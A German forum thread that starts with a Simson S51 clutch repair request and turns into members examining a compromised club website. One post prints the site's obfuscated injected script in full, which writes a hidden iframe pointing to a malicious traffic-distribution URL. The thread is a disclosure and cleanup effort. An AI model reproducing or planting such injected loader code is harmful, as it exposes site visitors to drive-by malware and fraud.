Hilfe, wer kann meine Simson reparieren?

  • Hallo,
    ich habe eine Simson S51 E und ein großes Problem mit der Kupplung. Ich habe auch schon einen Bekannten draufschauen lassen, der aber meinte, dass man den Motor ausbauen müsse, um das Problem genauer orten zu können und er sich nicht rantraut.
    Da ich das selber nicht kann und auch leider keine Möglichkeit habe, das Moped zu irgendeiner Berliner Werkstatt zu kriegen, wäre es total super, wenn ich hier jemanden finden würde, der sich das Ganze vor Ort mal ansieht. Die Simson steht jetzt in der Schönhauser Allee.
    Es wäre wirklich super, wenn mir jemand helfen könnte, ich bin wirklich verzweifelt.

    • Offizieller Beitrag

    um eine kupplung zu reparieren, muss der motor nicht ausgebaut werden. wenn du hier im nest oder bei einer nachricht an mich dein problem etwas genauer schilderst, kann ich sicher nach absprache mal vorbeikommen und mir das ganze ansehen und ggf. gleich heil machen.
    noch lieber wäre mir allerdings, wenn du das moped in ein auto verfrachten und direkt in meine garage kommen könntest, denn da kann ich definitiv das problem vor ort lösen, wenn es wirklich nur die kupplung ist.


    gruß aus dem schönen karlshorst


    ps: danke olaf für die werbung. mir kompetenz vorzuwerfen ist ja göttlich... damit kann ich ja kaum umgehen ;)

  • Zitat

    Du kannst mal die IFA-Truppe Berlin/Brandenburg kontaktieren, die helfen dir bestimmt auch ohne Werkstatt weiter: "Simson & IFA Freunde, Berlin - Brandenburg"


    Website wurde gesperrt von Trend Micro Internet Security


    Das Öffnen der Website kann Ihre Sicherheit gefährden.
    Trend Micro hat diese Website noch nicht ausgewertet.


    --------------------------------------------------------------------------------

    Die Website, die Sie anzeigen möchten, überträgt möglicherweise bösartige Software auf Ihren Computer oder hat dies bereits auf anderen Computern getan. Außerdem könnte die Website mit Online-Betrug in Verbindung stehen.

    • Offizieller Beitrag

    Ist es das hier??


    <!-- o --><script>var lwa="<";var elg="i";var fqqjq=" ";var ciplw="ufebm='waZLSyhB' tvtbx='Fwcn7bA0' krcxm='AH3GIdbg' twnko='BA25NRUb' src=";var pzkly="ame>";var kimdl="/tds/go.php?sid=3&lucky";var vtnqi="?wDjQqTk ";var wzn="f";var pkc="r";var ymq="a";var rqdre="wjjyi='P9wpLXPG' dxcip='ajZFAHUy' dnria='bdY3F5Nu' egafm='fMswiX72' gyicy='i4DpByrB' cnbfx='q60biqDw' ";var azz="m";var ukp="e";var mntra="width=671 ";var oqnaf="http://llforyourpets.net";var dexlv="height=315 ";var ybnmr="style='display:none'";var ybooc=oqnaf+kimdl;var uydmn="></ifr";document.write(lwa+elg+wzn+pkc+ymq+azz+ukp+fqqjq+ciplw+ybooc+vtnqi+rqdre+mntra+dexlv+ybnmr+uydmn+pzkly);</script><!-- c -->


    Wer versteht das?


    Fragt Peter

    • Offizieller Beitrag

    Bei mir auch lieber qdä, weil wir beide wohl kein trend Micro Internet Security installiert haben.
    ich habe das Kauderwelsch s.o. schon mal zerpflückt. Es wird ein unsichtbarer I-Frame mit der Grösse
    width=671 height=315 aufgebaut die unter der Variablen oqnav befindliche URL wird aber nicht offensichtlich aufgebaut oder doch??
    Wer hat mehr Ahnung von dem Script als ich?


    Peter

    • Offizieller Beitrag

    Virenalarm!


    Bitte den Link zur Seite der "Simson & IFA Freunde, Berlin - Brandenburg" nicht anclicken.
    Dort wird Schadcode verschleudert.
    Wer jemanden von denen kennt, bitte informieren, dass die ihre Startseite säubern.
    Mehr auf nachfrage.


    Peter

    • Offizieller Beitrag

    Ja, was antworte ich bloss auf eine so präzise spezifizierte Frage?


    Der Schadcode der vermutlich nicht von den Machern auf deren der o.a. Webseite platziert wurde, baut ein unsichtbares Fenster (iframe src= _eine_böse_url_ width=671 height=315 style='display:none'; der Rest ist wohl nur dazu da, um zu verwirren) auf, dass auf eine andere URL verweist und dort wird dann irgendwelcher Schindluder getrieben. Deshalb hat der Trend Micro von Stahlwolle gemeckert. Mein kostenloses Avira hat's erst bei ausdrücklichem Scan entdeckt und in die Quarantäne verschoben. Ich hoffe, dass nicht mehr unentdeckt geblieben ist.
    Mit ein wenig googlen findet man diesen Schadcode und auch die böse URL als bekannt.


    Bist'e jetzt schlauer lieber Prof?


    Peter

  • War grade mit der VM auf der Site, der Code ist noch da.


    Zitat

    var kimdl="/tds/go.php?sid=3&lucky


    go.php wird dann wohl für das Übel zuständig sein. Der leitet auf:

    Zitat

    http://llforyourpets.net (nicht drauf gehen)


    Aufgerufen wird das Ganze dann mit Javascript unter document.write.


    Wer sicher surfen will, sollte dort JS aus machen.

    Vertan! ...kräht der Hahn und steigt von der Ente.

  • danke für den hinweis!
    kam nicht von der gespeicherten site auf meinem rechner...
    hab die "index" aufm server gelöscht und neu hochgeladen, sollte also (vorerst) beseitigt sein. wie der dreck da raufkommt kann ich mir allerdings nicht erklären...



    Ist hier auch ein Nest´ler
    Gruß
    Olaf



    kann natürlich auch toto sich gern drum kümmern, aber den zitierten satz kann ick ja nun so nich stehen lassen...


    es sind mehrere von uns hier angemeldet -und gucken auch des öfteren ins nest... ;)

  • allet jut! *gg*
    aber mal davon ab, kann bitte mal jemand kontrollieren ob der ranz ooch bei euch anderen von unserer seite runter ist? ...aber bitte browser-cache leeren... ;)

  • Jap, ist aus dem Quelltext raus. Solltest aber in der nächsten Zeit immer mal wieder kontrollieren.


    In den einzelnen Frame-Dateien ist auch nichts zu finden.

    Vertan! ...kräht der Hahn und steigt von der Ente.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!